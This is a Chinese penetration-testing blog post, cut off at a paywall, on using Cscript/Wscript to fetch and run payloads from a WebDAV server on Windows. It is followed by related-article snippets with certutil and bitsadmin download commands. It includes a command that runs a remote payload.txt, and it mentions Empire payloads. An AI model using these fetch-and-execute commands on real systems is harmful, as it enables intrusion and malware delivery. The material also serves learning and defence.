Windows文件传输及执行—Cscript/Wscript

最新推荐文章于 2022-11-15 08:00:20 发布
最新推荐文章于 2022-11-15 08:00:20 发布
阅读量997 收藏
点赞数
分类专栏: 渗透测试 # Windows文件传输及执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_27828281/article/details/103571317
版权
本文探讨了如何通过Cscript/Wscript在Windows系统中进行文件下载和执行,特别是针对HTTP和WebDAV协议的情况。强调了在特定路径下找到缓存文件,并指出需要WebClient服务启动来执行UNC路径下载。提到了执行远程vbs脚本的命令格式,并提及了利用powershell下载并执行vbs payload的方法,适用于win7和win10系统,但存在将文件写入本地的缺点。
摘要由CSDN通过智能技术生成

声明:本文介绍的内容仅用于学习和研究目的,请勿用做非法用途。

 取决于Windows系统的版本,通过HTTP下载的文件缓存位置为IE的本地缓存,在下面的路径之一:

  • C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
  • C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE<subdir>

使用指向WebDav服务器的UNC路径下载的文件将保存在WebDAV客户端本地缓存:

  • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV

 在使用UNC路径下载payload时,需要WebClient 服务启动,如果没有启动,可在命令行前面加上pushd \\webdavserver & popd命令。

Cscript/Wscript下载&执行

执行远程vbs脚本的基本命令格式为:

cscript //E:jscript \\webdavserver\folder\payload.txt

网络调用进程:svchost.exe,payload位置:WebDav客户端本地缓存。
此外,也可以利用powershell执行vbs脚本,首先生成Empire的vbs payload࿱

最低0.47元/天 解锁文章
h8x0r
关注
专栏目录
使用 CScript.exe 运行脚本
weixin_34219944的博客
12-22 2350
CScript.exe 是 Windows 脚本宿主的一个版本,可以用来从命令行运行脚本。 CScript.exe 提供了用于设置脚本属性的,命令行开关。要使用 CScript.exe,可使用下列语法在命令行上键入命令: cscript [宿主选项...] [脚本名称] [脚本选项与参数] 其中的术语定义如下: 宿主...
cscript和wscript之间的区别
cunchi8090的博客
07-20 1210
Windows Script Host (WSH) has been part of Windows since Windows NT4. Windows Script Host provides architecture for building dynamic scripts that consist of a core object model, scripting hosts, and s...
WSCRIPT与CScript区别
06-27 2573
<br />WSCRIPT与CScript区别    <br />     窗口中运行,WSCRIPT;命令行中运行,CScrip;<br />     cscript因为把输出放进了控制台 所以可以对它重定向 方便程序调用<br />     wscript直接用窗口输出 适合调试程序和编写小工具 在windows下不用cmd的话cscript的输出会一闪而过 大多数情况下,列在下表中的选项适用于 WScript.exe 和 CScript.exe。例外情况会加以注释。<br /><br /> 参
cmd 环境下载文件的几种方法
小橙子的博客
03-09 3008
0x01 certutil certutil 是一个证书工具,功能挺丰富的,参数非常多 certutil -urlcache -split -f http://xxxxxx certutil -urlcache -split -f https://xxxxxx 1.txt #指定保存文件名 0x02 bitsadmin bitsadmin /transfer n http://...
如何在远程系统执行程序
Ms08067安全实验室
12-18 895
序言在我们获得用户名口令后,尝试远程登陆目标主机并执行程序,结合实际环境做了如下测试.目标远程登陆目标主机执行测试程序测试环境远程主机:ip:192.168.40.137 用户名:...
渗透测试之内网渗透远程程序执行小技巧
Blood_Pupil的博客
07-01 1057
本文介绍一些渗透测试环境中经常使用到的小技巧 IPC NLTM认证 ? HASH注入很强大? wce_hash注入 IPC管道执行命令 依赖于Task scheduler Wmic 依赖于135端口 Wmic是Windows Management Instrumentation的缩写,即Windows管理工具。通过Wmic可以查询系统信息并且可以在目标系统创建进程,如下图所示(因为当前计算机...
内网渗透中Windows下的内网传输技术
wo41ge的博客
12-18 602
前言 有时候我们拿到一个不能上传shell,但可以命令执行windows服务器时,可以通过多种方法进行文件上传和下载。 ftp 环境部署 首先,ftp支持ASCII码传输、也支持二进制传输,因此完全可以满足我们的上传下载需求。 我们可以在本地服务器先搭建一个ftp服务器 创建一个用户 靶机连接上ftp服务器之后,我们就可以进行上传、下载操作了。 上传和下载 ftp可以读取txt中的命令并执行,因此可以把需要执行的命令写入到一个txt文件中 echo open ip >>ftp.txt
Windows脚本手册
03-21
四、Windows脚本宿主(WScript/CScript) WScript和CScriptWindows脚本宿主的两个执行引擎,它们负责解释和运行VBS或JS等脚本。WScript提供了一个图形用户界面(GUI)来运行脚本,而CScript则以命令行方式运行,...
深入挖掘Windows脚本技术.doc
07-07
3. **ADODB.Stream对象**:作为ActiveX Data Objects的一部分,ADODB.Stream对象允许以流的形式读写文件,支持二进制数据,广泛应用于文件传输和数据处理。 4. **Microsoft.XMLHTTP对象**:通过HTTP协议访问网络...
Invoke-TmpDavFS:内存支持的Powershell WebDav服务器
05-07
调用TmpDavFS 内存支持的Powershell WebDav服务器 描述 使用可以安装为文件系统的powershell创建支持内存的webdav服务器。 注意:在Windows上挂载远程文件系统意味着在C:\ Windows \ ServiceProfiles \ LocalService \ AppData \ Local \ Temp \ TfsStore \ Tfs_DAV系统目录中对访问的文件进行本地缓存。 用法 Import-Module .\Invoke-TempDavFS.psm1 Invoke-TempDavFS 参数 port:要监听的端口,默认为8080。 sharename:要导出的共享的名称,默认为Temp 出口:侦听所有接口而不是本地主机(需要管理员)。 auth:需要认证,默认为false。
dav4rack:用于机架的WebDAV
02-26
DAV4Rack-机架的Web创作 DAV4Rack是用于通过Rack提供WebDAV的框架,允许通过HTTP创作内容。 它基于添加了一些有用的新功能: 为构建完全虚拟化的资源结构提供更好的资源支持 通用锁定以及特定于资源级别的锁定 拦截器中间件,提供对资源的虚拟映射 映射的资源路径 认证支持 资源回调 远程文件代理(包括对远程文件的sendfile支持) 基于Nokogiri的文档解析和构建 如果发现问题,请在github上创建一个新问题。 如果有修复程序,请分叉存储库,并向我发送包含您所做修改的请求请求。 如果您只是在这里使用图书馆,请尽情享受! 安装 通过RubyGems的 gem install dav4rack 文档 快速入门 如果您只想通过WebDAV共享文件夹,则可以使用以下命令启动一个简单的服务器: dav4rack 这将在端口3000上启动Unicorn,M
xTeamFoundationServer:用于配置TFS代理的PowerShell DSC资源
05-24
xTeamFoundationServer 用于配置TFS代理的PowerShell DSC资源 该模块提供了两个PowerShell DSC资源,可用于配置TFS构建控制器(对于TFS 2013)或TFS构建代理(对于TFS 2015)。 ## xTFSBuildController ##此资源提供了在计算机上配置TFS 2013构建控制器的功能。 请注意,它要求TFS 2013已经安装在目标计算机上(可能通过使用内置的Package资源)。 它需要以下参数: ControllerName-要配置的控制器的名称。 CollectionUrl-构建控制器应与之关联的TFS Team Project集合的URL。 确保-“ Present”或“ Absent”,指示应该配置还是取消配置构建控制器。 ServiceAccount-构建控制器应在其下运行的服务帐户的凭据。 Numb
cscript.exe
05-29
cscript.exe
C编译器CScript.zip
07-19
C 是一个 Shell 脚本,可以用一行代码编译和执行 C 脚本。 标签:CScript
漏洞利用后传文件
lunaqueen的博客
11-26 1864
继溢出测试拿到shell后进行文件传输
命令行/终端下载指令大全
最新发布
关注微信公众号【开源Linux】,后台回复『10T』,领取10T学习资源大放送,涵盖Linux、虚拟化、容器、云计算、网络、Python、Go等书籍和视频
11-15 459
1. 简介在我们渗透测试的过程中,通常会需要向目标主机传送一些文件,来达到提权,维持控制等目的。因此当不方便进行直接传输时,同时目标主机是能有网络连接的,那么此时就可以通过本地下载这种方法来达到文件传输的目的。此篇文章,我会对互联网上针对 win 与 linux 大部分的下载指令来做一个汇总,可能会有疏漏,但汇总的都是经常会用的。2. Linux2.1 Wget这款工具功能很丰富,可以充当某种功能...
Windows文件传输执行—Rundll32
qq_27828281的博客
12-20 649
Windows平台使用rundll32下载文件并执行
cscript 执行代码_在Windows执行恶意代码 by cscript&mshta
weixin_28950403的博客
01-17 1420
Windows自带的可执行文件+合理构造的payload脚本=获得会话cscript简介在cscript.exe来寻找和连接脚本的运行库,最常见的有VBScript和JavaScript。WSH环境包括两个脚本宿主:基于控制台的CScript和基于GUI的WScript。这两个脚本宿主提供几乎相同的功能,在大多数情况下,使用哪个脚本宿主来运行脚本并不重要。两个例外在于您如何与脚本交互; 也就是说,...
Windows脚本宿主对象模型:WScript详解
WScript对象在VBS编程中扮演着至关重要的角色,它为开发者提供了与脚本环境交互、控制脚本执行和处理输入参数的手段,是编写高效、灵活的Windows脚本的基础。掌握WScript对象的使用,能够显著提升VBS脚本的实用性和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值